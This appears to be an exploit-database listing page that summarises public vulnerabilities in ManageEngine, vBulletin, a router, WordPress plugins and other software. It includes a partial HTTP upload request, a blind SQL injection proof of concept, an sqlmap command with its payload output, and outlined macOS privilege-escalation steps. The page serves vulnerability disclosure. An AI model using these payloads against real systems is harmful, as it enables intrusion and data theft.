
Explore Vulnerabilities

Explore all Exploits:

ManageEngine Service Desk 10.0 – Cross-Site Scripting

Default installations of ManageEngine ServiceDesk Plus 10.0 were found to be vulnerable to an XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code in the context of the ManageEngine ServiceDesk Plus application.

vBulletin 5.6.1 – ‘nodeId’ SQL Injection

A vulnerability in vBulletin 5.6.1 prior to Patch Level 1 allows an attacker to inject arbitrary SQL commands via the 'nodeId' parameter. This can be exploited to gain access to the database and potentially gain remote code execution.

E-Commerce System 1.0 – Unauthenticated Remote Code Execution

E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection.

    POST /ecommerce/customer/controller.php?action=photos HTTP/1.1
    Host: thiennv.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828
    Content-Length: 4723
    Origin: http://thiennv.com
    Connection: close
    Referer: http://thiennv.com/ecommerce/index.php?q=profile
    Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
    Upgrade-Insecure-Requests: 1

Netlink XPON 1GE WiFi V2801RGW – Remote Command Execution

A vulnerability in Netlink XPON 1GE WiFi V2801RGW allows an attacker to execute arbitrary commands on the device by sending a specially crafted HTTP request. The vulnerability exists due to insufficient validation of user-supplied input in the target_addr parameter of the /boaform/admin/formPing page.

Complaint Management System 1.0 – ‘username’ SQL Injection

An SQL injection vulnerability exists in Complaint Management System 1.0: an attacker can inject arbitrary SQL code via the 'username' parameter to manipulate SQL queries, in order to bypass authentication or retrieve sensitive data from the database.

MacOS 320.whatis Script – Privilege Escalation

A privilege escalation vulnerability in macOS versions < 10.15.1. It is possible to gain root access by creating a bogus man page, creating a symlink in /usr/local/share/man/, creating a script file to be called by LaunchDaemon, and creating a Python script to be called by the LaunchDaemon.

TylerTech Eagle 2018.3.11 – Remote Code Execution

Eagle is software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution. /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application.

ChopSlider3 WordPress Plugin 3.4 – ‘id’ SQL Injection

A blind SQL injection vulnerability is present in Chop Slider 3 '/wp-content/plugins/chopslider/get_script/index.php':

    $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id);

PoC: Blind SQL injection:

    GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868

SQLMap using:

    sqlmap -u 'http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111' --level=5 --risk=3

sqlmap identified the following injection point(s) with a total of 17611 HTTP(s) requests:

    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: id=-3097 OR 2236=2236

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=1111111111 OR SLEEP(5)

Recent Exploits: